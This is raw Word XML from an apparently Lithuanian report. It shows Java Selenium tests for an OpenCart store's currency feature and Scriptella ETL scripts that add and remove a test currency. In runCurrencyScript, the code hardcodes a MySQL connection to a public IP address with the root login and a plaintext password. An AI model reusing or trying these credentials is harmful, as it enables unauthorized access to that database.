              <w:t>public void failingTest() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="767"/>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8" w:name="_Toc14392960"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>firstItemPrice = getPrice(0);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="76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69" w:name="_Toc14392961"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>secondItemPrice = getPrice(1);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="76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0" w:name="_Toc14392962"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.id("currency")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="77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1" w:name="_Toc14392963"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Assert.assertTrue(isCurrencyExist(TTILE));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="77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2" w:name="_Toc14392964"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>selectCurrency(TTILE);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="772"/>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3" w:name="_Toc14392965"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Assert.assertEquals("First item price is inccorect", firstItemPrice.multiply(VALUE).setScale(2, RoundingMode.HALF_UP), getPrice(0));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="77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4" w:name="_Toc14392966"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Assert.assertEquals("Secondly item price is inccorect", secondItemPrice.multiply(VALUE).setScale(2, RoundingMode.HALF_UP), getPrice(1));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="77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5" w:name="_Toc14392967"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="775"/>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6" w:name="_Toc14392968"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private BigDecimal getPrice(int index) {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="77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7" w:name="_Toc14392969"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>WebElement element = driver</w:t>
            </w:r>
            <w:bookmarkEnd w:id="777"/>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8" w:name="_Toc14392970"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>.findElements(By.xpath("//div[contains(@class, 'product-thumb transition')]//p[@class='price']"))</w:t>
            </w:r>
            <w:bookmarkEnd w:id="77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79" w:name="_Toc14392971"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>.get(index);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="77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0" w:name="_Toc14392972"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>String text = element.getText().split("\n")[0].replaceAll("[^\\d.]", "");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="78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1" w:name="_Toc14392973"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>return new BigDecimal(text);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="78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2" w:name="_Toc14392974"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="782"/>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3" w:name="_Toc14392975"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private boolean isCurrencyExist(String value){</w:t>
            </w:r>
            <w:bookmarkEnd w:id="78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4" w:name="_Toc14392976"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>for (WebElement currency : driver.findElement(By.id("currency")).findElement(By.tagName("div")).findElement(By.tagName("ul")).findElements(By.tagName("button"))) {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="78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5" w:name="_Toc14392977"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>if (currency.getText().contains(value)) {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="785"/>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6" w:name="_Toc14392978"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>return true;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="78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7" w:name="_Toc14392979"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="787"/>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8" w:name="_Toc14392980"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="78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89" w:name="_Toc14392981"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>return false;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="78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0" w:name="_Toc14392982"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="790"/>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1" w:name="_Toc14392983"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private void selectCurrency(String value){</w:t>
            </w:r>
            <w:bookmarkEnd w:id="79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2" w:name="_Toc14392984"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>for (WebElement currency : driver.findElement(By.id("currency")).findElement(By.tagName("div")).findElement(By.tagName("ul")).findElements(By.tagName("button"))) {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="792"/>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3" w:name="_Toc14392985"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>if (currency.getText().contains(value)) {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="79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4" w:name="_Toc14392986"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>currency.click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="79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lastRenderedPageBreak/>
              <w:t xml:space="preserve">                    </w:t>
            </w:r>
            <w:bookmarkStart w:id="795" w:name="_Toc14392987"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>return;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="795"/>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6" w:name="_Toc14392988"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="79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7" w:name="_Toc14392989"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="797"/>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8" w:name="_Toc14392990"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>throw new IllegalArgumentException("There is no such currency: " + value);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="79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799" w:name="_Toc14392991"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="799"/>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0" w:name="_Toc14392992"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private void insertCurrency() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="80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1" w:name="_Toc14392993"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Map&lt;String, String&gt; settings = new HashMap&lt;String, String&gt;();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="80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2" w:name="_Toc14392994"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>settings.put("title", TTILE);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="802"/>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3" w:name="_Toc14392995"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>settings.put("symbol", SYMBOL);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="80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4" w:name="_Toc14392996"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>settings.put("code", CODE);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="80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5" w:name="_Toc14392997"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>settings.put("value", String.valueOf(VALUE));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="805"/>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6" w:name="_Toc14392998"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>runCurrencyScript("currency_insert.xml", settings);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="80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7" w:name="_Toc14392999"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="807"/>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8" w:name="_Toc14393000"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private void removeCurrency(){</w:t>
            </w:r>
            <w:bookmarkEnd w:id="80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09" w:name="_Toc14393001"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Map&lt;String, String&gt; settings = new HashMap&lt;String, String&gt;();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="80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0" w:name="_Toc14393002"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>settings.put("title", TTILE);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="81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1" w:name="_Toc14393003"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>runCurrencyScript("currency_delete.xml", settings);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="81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2" w:name="_Toc14393004"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="812"/>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3" w:name="_Toc14393005"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>protected void runCurrencyScript(String scriptPath, Map&lt;String, String&gt; params){</w:t>
            </w:r>
            <w:bookmarkEnd w:id="81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4" w:name="_Toc14393006"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Map&lt;String, String&gt; settings = params;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="814"/>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5" w:name="_Toc14393007"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>settings.put("dbUrl", "jdbc:mysql://185.36.81.204:3306/carttwo_db");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="815"/>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6" w:name="_Toc14393008"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>settings.put("dbLogin", "root");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="816"/>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7" w:name="_Toc14393009"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>settings.put("dbPassword", "Labas123");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="817"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>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8" w:name="_Toc14393010"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>try {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="818"/>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19" w:name="_Toc14393011"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>EtlExecutor.newExecutor(getClass().getClassLoader().getResource(scriptPath), settings)</w:t>
            </w:r>
            <w:bookmarkEnd w:id="819"/>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20" w:name="_Toc14393012"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>.execute();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="820"/>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21" w:name="_Toc14393013"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>} catch (Exception e) {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="821"/>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22" w:name="_Toc14393014"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>throw new IllegalArgumentException("Error running script: " + scriptPath, e);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="822"/>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23" w:name="_Toc14393015"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="823"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:bookmarkStart w:id="824" w:name="_Toc14393016"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="824"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="825" w:name="_Toc14393017"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="825"/>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Currency_insert.xml turinys:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E4ACD" w:rsidRPr="00AD4464" w:rsidRDefault="003E4ACD"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26" w:name="_Toc14393018"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;!DOCTYPE etl SYSTEM "http://scriptella.javaforge.com/dtd/etl.dtd"&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="826"/>
          </w:p>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27" w:name="_Toc14393019"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;etl&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="82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28" w:name="_Toc14393020"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;connection url="$dbUrl" user="$dbLogin" password="$dbPassword" /&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="828"/>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29" w:name="_Toc14393021"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;query&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="82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bookmarkStart w:id="830" w:name="_Toc14393022"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>SELECT MAX(currency_id) as id from oc_currency;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="83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bookmarkStart w:id="831" w:name="_Toc14393023"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="83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r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:bookmarkStart w:id="832" w:name="_Toc14393024"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Insert into oc_currency (currency_id, title, code,</w:t>
            </w:r>
            <w:bookmarkEnd w:id="83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r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:bookmarkStart w:id="833" w:name="_Toc14393025"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>symbol_left, symbol_right, decimal_place, value,</w:t>
            </w:r>
            <w:bookmarkEnd w:id="83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r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:bookmarkStart w:id="834" w:name="_Toc14393026"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>status,date_modified)</w:t>
            </w:r>
            <w:bookmarkEnd w:id="83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r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:bookmarkStart w:id="835" w:name="_Toc14393027"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>values (15, 'JK Coins','JKC','J','',2,5,1,'2016-12-19 22:22:00.0');</w:t>
            </w:r>
            <w:bookmarkEnd w:id="83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bookmarkStart w:id="836" w:name="_Toc14393028"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;/script&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="83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37" w:name="_Toc14393029"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;/query&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="837"/>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838" w:name="_Toc14393030"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;/etl&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="838"/>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lastRenderedPageBreak/>
        <w:t>Currency_remove.xml turinys:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003178F4" w:rsidRPr="00AD4464" w:rsidRDefault="003178F4"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39" w:name="_Toc14393031"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;!DOCTYPE etl SYSTEM "http://scriptella.javaforge.com/dtd/etl.dtd"&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="839"/>
          </w:p>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40" w:name="_Toc14393032"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;etl&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="84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41" w:name="_Toc14393033"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;connection url="$dbUrl" user="$dbLogin" password="$dbPassword" /&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="84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42" w:name="_Toc14393034"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
